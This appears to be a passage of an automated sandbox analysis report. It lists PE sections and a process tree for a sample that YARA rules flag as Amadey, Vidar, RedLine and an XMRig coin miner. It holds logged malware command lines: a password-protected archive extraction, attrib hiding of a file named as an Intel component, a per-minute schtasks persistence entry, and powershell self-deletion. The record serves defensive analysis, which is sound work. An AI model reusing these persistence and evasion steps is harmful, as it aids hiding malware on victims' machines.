.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
syfpipoa	0x6b000	0x2b2000	0x2b1c00	de89f444313838c39a8a4f882c2748bc	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kqlprvhw	0x31d000	0x1000	0x400	28101f3bd65ae0792778adbc9af325e8	False	0.7939453125	data	6.124208055651814	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x31e000	0x3000	0x2200	130e21ef41e474edd54e9d5d1c151e06	False	0.06330422794117647	DOS executable (COM)	0.7936231932797173	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x152	ASCII text, with CRLF line terminators			0.6479289940828402
RT_MANIFEST	0x691c4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	18:20:12
Start date:	14/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x660000
File size:	3'028'480 bytes
MD5 hash:	524AFF0AE21CF7D4731596E8F3967E32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.268839327195.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:20:13
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x9c0000
File size:	3'028'480 bytes
MD5 hash:	524AFF0AE21CF7D4731596E8F3967E32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.268855891646.0000000005400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:20:13
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x9c0000
File size:	3'028'480 bytes
MD5 hash:	524AFF0AE21CF7D4731596E8F3967E32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.268857006626.0000000005370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:21:00
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x9c0000
File size:	3'028'480 bytes
MD5 hash:	524AFF0AE21CF7D4731596E8F3967E32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.269317871785.0000000004920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	18:21:08
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe"
Imagebase:	0xb0000
File size:	2'955'776 bytes
MD5 hash:	4765874B881A2BCE3AAEFB16805EF1A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.269406632525.0000000005080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:21:14
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x630000
File size:	2'955'776 bytes
MD5 hash:	4765874B881A2BCE3AAEFB16805EF1A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.269465852321.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:21:14
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe"
Imagebase:	0x400000
File size:	4'438'776 bytes
MD5 hash:	3A425626CBD40345F5B8DDDD6B2B9EFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 88%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	18:21:15
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x630000
File size:	2'955'776 bytes
MD5 hash:	4765874B881A2BCE3AAEFB16805EF1A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.269472681805.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:21:19
Start date:	14/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Imagebase:	0x7ff6f8ee0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	18:21:19
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff673430000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	18:21:19
Start date:	14/12/2024
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 65,10
Imagebase:	0x7ff653ff0000
File size:	33'280 bytes
MD5 hash:	59D1ED51ACB8C3D50F1306FD75F20E99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:21:19
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Imagebase:	0xb50000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:21:19
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
Imagebase:	0x1e0000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:21:19
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff673430000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:21:20
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_7.zip -oextracted
Imagebase:	0xb50000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:21:20
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_6.zip -oextracted
Imagebase:	0xb50000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:21:21
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_5.zip -oextracted
Imagebase:	0xb50000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:21:21
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_4.zip -oextracted
Imagebase:	0xb50000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:21:21
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_3.zip -oextracted
Imagebase:	0xb50000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:21:22
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
Imagebase:	0x1e0000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.269597691521.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:21:22
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_2.zip -oextracted
Imagebase:	0xb50000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:21:22
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_1.zip -oextracted
Imagebase:	0xb50000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:21:22
Start date:	14/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H "in.exe"
Imagebase:	0x7ff63f370000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:21:22
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\in.exe
Wow64 process (32bit):	false
Commandline:	"in.exe"
Imagebase:	0x7ff7ec690000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff63f370000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff63f370000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff673430000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Imagebase:	0x7ff761180000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff673430000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell ping 127.0.0.1; del in.exe
Imagebase:	0x7ff6bb4e0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff673430000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff673430000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\PING.EXE" 127.0.0.1
Imagebase:	0x7ff658c30000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff678f40000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff6a76c0000
File size:	4'849'904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.269554816675.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.269554816675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.269556564358.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.269556913458.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	18:21:23
Start date:	14/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff6bb4e0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:21:24
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff673430000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:21:24
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"
Imagebase:	0x7ff636e60000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	18:21:24
Start date:	14/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\PING.EXE" 127.1.10.1
Imagebase:	0x7ff658c30000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:21:25
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
Imagebase:	0x7ff636e60000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	18:21:28
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"
Imagebase:	0x7ff6bd5f0000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:21:31
Start date:	14/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff70fbc0000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	18:21:33
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"
Imagebase:	0x7ff67d4d0000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 63%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	18:21:33
Start date:	14/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff734c50000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	18:21:44
Start date:	14/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff734c50000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	18:21:46
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
Imagebase:	0x7ff741ba0000
File size:	73'505'272 bytes
MD5 hash:	EC1C0306004DB340A454EEAC2ABEDA4A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	18:21:49
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
Imagebase:	0x7ff741ba0000
File size:	73'505'272 bytes
MD5 hash:	EC1C0306004DB340A454EEAC2ABEDA4A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	18:21:49
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe"
Imagebase:	0x400000
File size:	321'024 bytes
MD5 hash:	876A365BDA09B9EF39605E375D677F0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000030.00000002.270506120282.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000030.00000002.270498807238.0000000000899000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security
Antivirus matches:	Detection: 62%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	18:21:51
Start date:	14/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ver"
Imagebase:	0x7ff6f8ee0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	18:21:51
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff673430000
